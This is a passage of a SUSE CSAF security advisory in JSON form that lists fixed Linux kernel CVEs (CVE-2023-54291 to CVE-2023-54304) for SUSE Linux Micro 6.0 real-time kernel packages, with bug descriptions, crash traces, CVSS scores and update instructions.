"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54291"
},
{
"cve": "CVE-2023-54292",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54292"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: Fix data race on CQP request done\n\nKCSAN detects a data race on cqp_request-\u003erequest_done memory location\nwhich is accessed locklessly in irdma_handle_cqp_op while being\nupdated in irdma_cqp_ce_handler.\n\nAnnotate lockless intent with READ_ONCE/WRITE_ONCE to avoid any\ncompiler optimizations like load fusing and/or KCSAN warning.\n\n[222808.417128] BUG: KCSAN: data-race in irdma_cqp_ce_handler [irdma] / irdma_wait_event [irdma]\n\n[222808.417532] write to 0xffff8e44107019dc of 1 bytes by task 29658 on cpu 5:\n[222808.417610] irdma_cqp_ce_handler+0x21e/0x270 [irdma]\n[222808.417725] cqp_compl_worker+0x1b/0x20 [irdma]\n[222808.417827] process_one_work+0x4d1/0xa40\n[222808.417835] worker_thread+0x319/0x700\n[222808.417842] kthread+0x180/0x1b0\n[222808.417852] ret_from_fork+0x22/0x30\n\n[222808.417918] read to 0xffff8e44107019dc of 1 bytes by task 29688 on cpu 1:\n[222808.417995] irdma_wait_event+0x1e2/0x2c0 [irdma]\n[222808.418099] irdma_handle_cqp_op+0xae/0x170 [irdma]\n[222808.418202] irdma_cqp_cq_destroy_cmd+0x70/0x90 [irdma]\n[222808.418308] irdma_puda_dele_rsrc+0x46d/0x4d0 [irdma]\n[222808.418411] irdma_rt_deinit_hw+0x179/0x1d0 [irdma]\n[222808.418514] irdma_ib_dealloc_device+0x11/0x40 [irdma]\n[222808.418618] ib_dealloc_device+0x2a/0x120 [ib_core]\n[222808.418823] __ib_unregister_device+0xde/0x100 [ib_core]\n[222808.418981] ib_unregister_device+0x22/0x40 [ib_core]\n[222808.419142] irdma_ib_unregister_device+0x70/0x90 [irdma]\n[222808.419248] i40iw_close+0x6f/0xc0 [irdma]\n[222808.419352] i40e_client_device_unregister+0x14a/0x180 [i40e]\n[222808.419450] i40iw_remove+0x21/0x30 [irdma]\n[222808.419554] auxiliary_bus_remove+0x31/0x50\n[222808.419563] device_remove+0x69/0xb0\n[222808.419572] device_release_driver_internal+0x293/0x360\n[222808.419582] driver_detach+0x7c/0xf0\n[222808.419592] bus_remove_driver+0x8c/0x150\n[222808.419600] driver_unregister+0x45/0x70\n[222808.419610] auxiliary_driver_unregister+0x16/0x30\n[222808.419618] irdma_exit_module+0x18/0x1e [irdma]\n[222808.419733] __do_sys_delete_module.constprop.0+0x1e2/0x310\n[222808.419745] __x64_sys_delete_module+0x1b/0x30\n[222808.419755] do_syscall_64+0x39/0x90\n[222808.419763] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n[222808.419829] value changed: 0x01 -\u003e 0x03",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54292",
"url": "https://www.suse.com/security/cve/CVE-2023-54292"
},
{
"category": "external",
"summary": "SUSE Bug 1255800 for CVE-2023-54292",
"url": "https://bugzilla.suse.com/1255800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54292"
},
{
"cve": "CVE-2023-54293",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54293"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbcache: fixup btree_cache_wait list damage\n\nWe get a kernel crash about \"list_add corruption. next-\u003eprev should be\nprev (ffff9c801bc01210), but was ffff9c77b688237c.\n(next=ffffae586d8afe68).\"\n\ncrash\u003e struct list_head 0xffff9c801bc01210\nstruct list_head {\n next = 0xffffae586d8afe68,\n prev = 0xffffae586d8afe68\n}\ncrash\u003e struct list_head 0xffff9c77b688237c\nstruct list_head {\n next = 0x0,\n prev = 0x0\n}\ncrash\u003e struct list_head 0xffffae586d8afe68\nstruct list_head struct: invalid kernel virtual address: ffffae586d8afe68 type: \"gdb_readmem_callback\"\nCannot access memory at address 0xffffae586d8afe68\n\n[230469.019492] Call Trace:\n[230469.032041] prepare_to_wait+0x8a/0xb0\n[230469.044363] ? bch_btree_keys_free+0x6c/0xc0 [escache]\n[230469.056533] mca_cannibalize_lock+0x72/0x90 [escache]\n[230469.068788] mca_alloc+0x2ae/0x450 [escache]\n[230469.080790] bch_btree_node_get+0x136/0x2d0 [escache]\n[230469.092681] bch_btree_check_thread+0x1e1/0x260 [escache]\n[230469.104382] ? finish_wait+0x80/0x80\n[230469.115884] ? bch_btree_check_recurse+0x1a0/0x1a0 [escache]\n[230469.127259] kthread+0x112/0x130\n[230469.138448] ? kthread_flush_work_fn+0x10/0x10\n[230469.149477] ret_from_fork+0x35/0x40\n\nbch_btree_check_thread() and bch_dirty_init_thread() may call\nmca_cannibalize() to cannibalize other cached btree nodes. Only one thread\ncan do it at a time, so the op of other threads will be added to the\nbtree_cache_wait list.\n\nWe must call finish_wait() to remove op from btree_cache_wait before free\nit\u0027s memory address. Otherwise, the list will be damaged. Also should call\nbch_cannibalize_unlock() to release the btree_cache_alloc_lock and wake_up\nother waiters.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54293",
"url": "https://www.suse.com/security/cve/CVE-2023-54293"
},
{
"category": "external",
"summary": "SUSE Bug 1255801 for CVE-2023-54293",
"url": "https://bugzilla.suse.com/1255801"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54293"
},
{
"cve": "CVE-2023-54296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: SVM: Get source vCPUs from source VM for SEV-ES intrahost migration\n\nFix a goof where KVM tries to grab source vCPUs from the destination VM\nwhen doing intrahost migration. Grabbing the wrong vCPU not only hoses\nthe guest, it also crashes the host due to the VMSA pointer being left\nNULL.\n\n BUG: unable to handle page fault for address: ffffe38687000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: 0000 [#1] SMP NOPTI\n CPU: 39 PID: 17143 Comm: sev_migrate_tes Tainted: GO 6.5.0-smp--fff2e47e6c3b-next #151\n Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 34.28.0 07/10/2023\n RIP: 0010:__free_pages+0x15/0xd0\n RSP: 0018:ffff923fcf6e3c78 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffffe38687000000 RCX: 0000000000000100\n RDX: 0000000000000100 RSI: 0000000000000000 RDI: ffffe38687000000\n RBP: ffff923fcf6e3c88 R08: ffff923fcafb0000 R09: 0000000000000000\n R10: 0000000000000000 R11: ffffffff83619b90 R12: ffff923fa9540000\n R13: 0000000000080007 R14: ffff923f6d35d000 R15: 0000000000000000\n FS: 0000000000000000(0000) GS:ffff929d0d7c0000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: ffffe38687000000 CR3: 0000005224c34005 CR4: 0000000000770ee0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n sev_free_vcpu+0xcb/0x110 [kvm_amd]\n svm_vcpu_free+0x75/0xf0 [kvm_amd]\n kvm_arch_vcpu_destroy+0x36/0x140 [kvm]\n kvm_destroy_vcpus+0x67/0x100 [kvm]\n kvm_arch_destroy_vm+0x161/0x1d0 [kvm]\n kvm_put_kvm+0x276/0x560 [kvm]\n kvm_vm_release+0x25/0x30 [kvm]\n __fput+0x106/0x280\n ____fput+0x12/0x20\n task_work_run+0x86/0xb0\n do_exit+0x2e3/0x9c0\n do_group_exit+0xb1/0xc0\n __x64_sys_exit_group+0x1b/0x20\n do_syscall_64+0x41/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n \u003c/TASK\u003e\n CR2: ffffe38687000000",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54296",
"url": "https://www.suse.com/security/cve/CVE-2023-54296"
},
{
"category": "external",
"summary": "SUSE Bug 1255793 for CVE-2023-54296",
"url": "https://bugzilla.suse.com/1255793"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54296"
},
{
"cve": "CVE-2023-54297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: zoned: fix memory leak after finding block group with super blocks\n\nAt exclude_super_stripes(), if we happen to find a block group that has\nsuper blocks mapped to it and we are on a zoned filesystem, we error out\nas this is not supposed to happen, indicating either a bug or maybe some\nmemory corruption for example. However we are exiting the function without\nfreeing the memory allocated for the logical address of the super blocks.\nFix this by freeing the logical address.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54297",
"url": "https://www.suse.com/security/cve/CVE-2023-54297"
},
{
"category": "external",
"summary": "SUSE Bug 1255795 for CVE-2023-54297",
"url": "https://bugzilla.suse.com/1255795"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54297"
},
{
"cve": "CVE-2023-54299",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54299"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: bus: verify partner exists in typec_altmode_attention\n\nSome usb hubs will negotiate DisplayPort Alt mode with the device\nbut will then negotiate a data role swap after entering the alt\nmode. The data role swap causes the device to unregister all alt\nmodes, however the usb hub will still send Attention messages\neven after failing to reregister the Alt Mode. type_altmode_attention\ncurrently does not verify whether or not a device\u0027s altmode partner\nexists, which results in a NULL pointer error when dereferencing\nthe typec_altmode and typec_altmode_ops belonging to the altmode\npartner.\n\nVerify the presence of a device\u0027s altmode partner before sending\nthe Attention message to the Alt Mode driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54299",
"url": "https://www.suse.com/security/cve/CVE-2023-54299"
},
{
"category": "external",
"summary": "SUSE Bug 1255789 for CVE-2023-54299",
"url": "https://bugzilla.suse.com/1255789"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54299"
},
{
"cve": "CVE-2023-54300",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54300"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath9k: avoid referencing uninit memory in ath9k_wmi_ctrl_rx\n\nFor the reasons also described in commit b383e8abed41 (\"wifi: ath9k: avoid\nuninit memory read in ath9k_htc_rx_msg()\"), ath9k_htc_rx_msg() should\nvalidate pkt_len before accessing the SKB.\n\nFor example, the obtained SKB may have been badly constructed with\npkt_len = 8. In this case, the SKB can only contain a valid htc_frame_hdr\nbut after being processed in ath9k_htc_rx_msg() and passed to\nath9k_wmi_ctrl_rx() endpoint RX handler, it is expected to have a WMI\ncommand header which should be located inside its data payload.\n\nImplement sanity checking inside ath9k_wmi_ctrl_rx(). Otherwise, uninit\nmemory can be referenced.\n\nTested on Qualcomm Atheros Communications AR9271 802.11n .\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54300",
"url": "https://www.suse.com/security/cve/CVE-2023-54300"
},
{
"category": "external",
"summary": "SUSE Bug 1255790 for CVE-2023-54300",
"url": "https://bugzilla.suse.com/1255790"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54300"
},
{
"cve": "CVE-2023-54302",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54302"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: Fix data race on CQP completion stats\n\nCQP completion statistics is read lockesly in irdma_wait_event and\nirdma_check_cqp_progress while it can be updated in the completion\nthread irdma_sc_ccq_get_cqe_info on another CPU as KCSAN reports.\n\nMake completion statistics an atomic variable to reflect coherent updates\nto it. This will also avoid load/store tearing logic bug potentially\npossible by compiler optimizations.\n\n[77346.170861] BUG: KCSAN: data-race in irdma_handle_cqp_op [irdma] / irdma_sc_ccq_get_cqe_info [irdma]\n\n[77346.171383] write to 0xffff8a3250b108e0 of 8 bytes by task 9544 on cpu 4:\n[77346.171483] irdma_sc_ccq_get_cqe_info+0x27a/0x370 [irdma]\n[77346.171658] irdma_cqp_ce_handler+0x164/0x270 [irdma]\n[77346.171835] cqp_compl_worker+0x1b/0x20 [irdma]\n[77346.172009] process_one_work+0x4d1/0xa40\n[77346.172024] worker_thread+0x319/0x700\n[77346.172037] kthread+0x180/0x1b0\n[77346.172054] ret_from_fork+0x22/0x30\n\n[77346.172136] read to 0xffff8a3250b108e0 of 8 bytes by task 9838 on cpu 2:\n[77346.172234] irdma_handle_cqp_op+0xf4/0x4b0 [irdma]\n[77346.172413] irdma_cqp_aeq_cmd+0x75/0xa0 [irdma]\n[77346.172592] irdma_create_aeq+0x390/0x45a [irdma]\n[77346.172769] irdma_rt_init_hw.cold+0x212/0x85d [irdma]\n[77346.172944] irdma_probe+0x54f/0x620 [irdma]\n[77346.173122] auxiliary_bus_probe+0x66/0xa0\n[77346.173137] really_probe+0x140/0x540\n[77346.173154] __driver_probe_device+0xc7/0x220\n[77346.173173] driver_probe_device+0x5f/0x140\n[77346.173190] __driver_attach+0xf0/0x2c0\n[77346.173208] bus_for_each_dev+0xa8/0xf0\n[77346.173225] driver_attach+0x29/0x30\n[77346.173240] bus_add_driver+0x29c/0x2f0\n[77346.173255] driver_register+0x10f/0x1a0\n[77346.173272] __auxiliary_driver_register+0xbc/0x140\n[77346.173287] irdma_init_module+0x55/0x1000 [irdma]\n[77346.173460] do_one_initcall+0x7d/0x410\n[77346.173475] do_init_module+0x81/0x2c0\n[77346.173491] load_module+0x1232/0x12c0\n[77346.173506] __do_sys_finit_module+0x101/0x180\n[77346.173522] __x64_sys_finit_module+0x3c/0x50\n[77346.173538] do_syscall_64+0x39/0x90\n[77346.173553] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n[77346.173634] value changed: 0x0000000000000094 -\u003e 0x0000000000000095",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54302",
"url": "https://www.suse.com/security/cve/CVE-2023-54302"
},
{
"category": "external",
"summary": "SUSE Bug 1255792 for CVE-2023-54302",
"url": "https://bugzilla.suse.com/1255792"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54302"
},
{
"cve": "CVE-2023-54303",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54303"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Disable preemption in bpf_perf_event_output\n\nThe nesting protection in bpf_perf_event_output relies on disabled\npreemption, which is guaranteed for kprobes and tracepoints.\n\nHowever bpf_perf_event_output can be also called from uprobes context\nthrough bpf_prog_run_array_sleepable function which disables migration,\nbut keeps preemption enabled.\n\nThis can cause task to be preempted by another one inside the nesting\nprotection and lead eventually to two tasks using same perf_sample_data\nbuffer and cause crashes like:\n\n kernel tried to execute NX-protected page - exploit attempt? (uid: 0)\n BUG: unable to handle page fault for address: ffffffff82be3eea\n ...\n Call Trace:\n ? __die+0x1f/0x70\n ? page_fault_oops+0x176/0x4d0\n ? exc_page_fault+0x132/0x230\n ? asm_exc_page_fault+0x22/0x30\n ? perf_output_sample+0x12b/0x910\n ? perf_event_output+0xd0/0x1d0\n ? bpf_perf_event_output+0x162/0x1d0\n ? bpf_prog_c6271286d9a4c938_krava1+0x76/0x87\n ? __uprobe_perf_func+0x12b/0x540\n ? uprobe_dispatcher+0x2c4/0x430\n ? uprobe_notify_resume+0x2da/0xce0\n ? atomic_notifier_call_chain+0x7b/0x110\n ? exit_to_user_mode_prepare+0x13e/0x290\n ? irqentry_exit_to_user_mode+0x5/0x30\n ? asm_exc_int3+0x35/0x40\n\nFixing this by disabling preemption in bpf_perf_event_output.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54303",
"url": "https://www.suse.com/security/cve/CVE-2023-54303"
},
{
"category": "external",
"summary": "SUSE Bug 1255785 for CVE-2023-54303",
"url": "https://bugzilla.suse.com/1255785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54303"
},
{
"cve": "CVE-2023-54304",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54304"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: meson_sm: fix to avoid potential NULL pointer dereference\n\nof_match_device() may fail and returns a NULL pointer.\n\nFix this by checking the return value of of_match_device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
